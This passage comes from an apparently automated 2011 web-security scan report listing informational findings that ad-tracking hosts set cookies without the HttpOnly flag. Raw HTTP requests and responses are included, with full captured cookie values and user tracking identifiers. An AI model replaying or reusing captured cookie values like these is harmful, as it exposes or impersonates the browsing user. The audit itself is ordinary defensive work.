UeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_VOiH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
Set-Cookie: rtc_IiAg=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:12:31 GMT


13.43. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_JXtz=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; rsi_segs_1000000=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; rsiPus_aQJL="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JXtz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOBcXIQT7v8flOljrAByA1W2ycLqLUl+VNv9A50qQeW0skFhBnmOmk8I5Sv5jpQhg/tbnjpu0a1vDJXD1SJv2fw+YUoCsZRmCQYyjnQFQDPVfiYLeSoPxDBs89GWWbRUoRZrPYPRzYFf2oW7z9E4935niTvO+hYyvUJ1hgkhKNykF+vhgAdnVcJkCktu6nmYMKYawYH1F/48MplqIWwcaLdWmaEzzHPwetIIU2lYlRvocFcE+RZ2KpcEJnk9101BB6NGfIYAUGf/yKhVW1rd/ZDn9tF6IOq3XVfpE1UhIXsqIP9rU/vRi3jLsRImkwZBivcGp6uHDI9lnS3GwAVu7gA7+d5DMTENqoZ/IjON1RXfKvGmZx7O7dX3bM7oI8Wg/OsXxqY64Gif4tiuIhz8bG+ZiX+KDAuOz5aK2J0cQmkR84AGfLehIEAxq0AsT+jJ2fUX+YD3zP8MYqW0OmWuqOzqFtMMqkLXF9NCF+8uaR1J+sGfts/J0sUMhJc5ZpqSnmGEDLBLgx962RquibuFY7j; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
Set-Cookie: rtc_2MY1=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:01:06 GMT


13.44. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_M6m_=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; rsiPus_nlnh="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_M6m_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
Set-Cookie: rtc_DsnD=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:17:48 GMT


13.45. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; 
rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
Set-Cookie: rtc_OGR2=MLvntzM1ZwprJ5GrZptPU8kfvO50XCqRdbbBVCzWA7wKgWGALKgYuCgokRUkKaVbf6iua6BFIG+TILu7TbUmMXZ4av8HRAe4KYFLWnH2fWgnisgOGBeZmmKUqquUkgC4hRzXGKFab7Lb9B59JNOJ/xFb8GBXg5jvFxrHVbli/8Zor/9ChiL4/bQm6TO6TWxu4AgYzNZ72h1XqxtG9p0MdrNQe3LHXC6fnG1kByw3zyobXTfPi4DPALx4NKQns9E+z57ujh9chYrntouXx7ACuW4riwKRXnGFWaXd9XYjGOfk1HcOLoD/R5QVFVRuoMUGopU31HECElX6E2bfLU+9tdIDU+kUTRCmWr5JLrb87Jt7OVaoLAq/85Y9Ms44mJIcn0rkW9LUePFWksHE2CoKDepJjuyWa3ETKZ0Aq9xaUXtHIO3c28po3oYn6A8ZpH3iIktkPZLMJm2IsaHRp5SdnL4h/haqoSoy+G0JIgrh9+YoXKMNIUuxY8Hsb1z7aJDhNimaKb2aalXhIMbWA7etx8/6CzIr88c0OddsBPCHXCJIddMXYFgBI6+8PXCr8hQLd2ICbxdDKY7scjurnOw05lMFkma6YksmU9q2R2zn2ajltv5jpc00N/GUaqd7lFY7wi+33n9K2dHnDyqe2AWfOsKZeN7pBeT9lJqwcq6za++tJckSpQd8Np0e+b5H29rw2ZkqFHmdRcDtJ0ne+0DA5+zwohtVTNp7a5TBfAwnlfZ07CddeADkdqY+9Ngfj1gSsmBTivZBx9XEnRMrLnmeE2SPBab+WsIc/dOvBYfymKPtuyg7ANae+sxwmf/gJVGxYYlBZ9uHupi17rZAniqBNddhUmuqJoZJKQ+Gryj+0HeBIpYNjHxMGjndI8DLD4ELT6ZIPmijIaC/DL0eQYkcP9TcXBMOEhg7h8af15wUtndadKLvnQ2fLYsJ5ZYKfHc4xImm/XGb4yo0MgL7eJokNFX37BpCpEpncs9aC6Uy9LFtas6VSGf3a4/u+RqaWD7M8z8Hjqn3p5g70qm83Sx9hv7HiudM4ekcQQcm3rFe5RNB2yMfXWPnGeriO8IA64YLzH6adffaB6BBVdjfXTxnqIa3jTBTiBQtc24eDqBLafRWpwCJfAZjjxOZVZUxg2DAxJIfkT1QWphzCXkIPL9hUCYaJH0pHMVM0F/oAlXEPpEQW5pwrauue6TVqIKlQcAlnVabYJRpUFSEp0taV8MknpG5owQC20y7BfggSb/I74viqZvRKAHemiJM2Zoy/XCCnDNb24svlN7Wk815hWml+5yHBuHiOwGhDPYmJAQ8WKx3BLduOn80UZ5yRj4KiS94Z5AOLBJojzSBCuqhf3XJdWfaheh5ogEr+OpcEbkzbnPKuv3wbHYlyYfYZzzSJjZnHwveZGHLfJw5hRPIOguoeynfb8pi3L9wnmCtiIG/W+rLac5yPWgI2quVhRGozXl0Hr/7+LPz1zwP+ET482CD/BXd4v3bh/84xeB8VAs/TUJ7byaeEQMNWsn7jXMbBvSzv+zJOkCfiZyLa8GWQA8=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:18:54 GMT


13.46. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902865_11051:0_13981:207803_13479:207803_15758:367136_12704:367136_4895:795321_10164:1159597_10638:1159597_10640:1159597_10641:1159597_1437:1159597_1660:1723193; uid=1_1304902865_1303179323923:6792170478871670; kwd=1_1304902865_12936:207803_11317:1159597_11717:1159597_11718:1159597_11719:1159597; sit=1_1304902865_3006:0:0_3455:207803:207803_2988:430083:395912_3801:542526:542106_1714:827059:795321_3306:1054685:367136_719:1160424:1159597_2451:1211293:1206193_3236:1369256:1369138_782:1723542:1723193; cre=1_1304902865_29802:59536:1:541894_29805:59534:1:542555; bpd=1_1304902865_1ZCU5:4QMi; apd=1_1304902865; scg=1_1304902865; ppd=1_1304902865; afl=1_1304902865

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1304902873_11051:0_13981:207811_13479:207811_15758:367144_12704:367144_4895:795329_10164:1159605_10638:1159605_10640:1159605_10641:1159605_1437:1159605_1660:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: uid=1_1304902873_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: kwd=1_1304902873_12936:207811_11317:1159605_11717:1159605_11718:1159605_11719:1159605; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: sit=1_1304902873_3006:8:0_3455:207811:207811_2988:430091:395920_3801:542534:542114_1714:827067:795329_3306:1054693:367144_719:1160432:1159605_2451:1211301:1206201_3236:1369264:1369146_782:1723550:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: cre=1_1304902873_29802:59536:1:541902_29805:59534:1:542563; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: bpd=1_1304902873_1ZCU5:4QMq; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: apd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: scg=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: ppd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: afl=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:01:13 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

13.47. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-0fxbD82AR3K-g.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Welcome HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EIcAGO8kjVmtjIMIufKMgQG7AQHYBoG0AJrRo5lYEPGaOCbTzF4os9HUosxSCyo0wR_hEMIAwfEIICDSDiAJ0Tu2CpGSx0MQIRgguzLBLTOBKCAwLh6DS1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sjA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EJcAJe8kjVmM-5GL0ZmY8frRi58oyBABuwEB2gaB9ACa0aOZWBDxmjgm08xeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4eg0tTnxQATSAOiSAOEAviC2SxCCSLLTlKOLIw; expires=Sun, 07-Aug-2011 01:01:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 09 May 2011 01:01:00 GMT
Server: QS

GIF89a.......,.................D..;

13.48. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5970|1|14 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
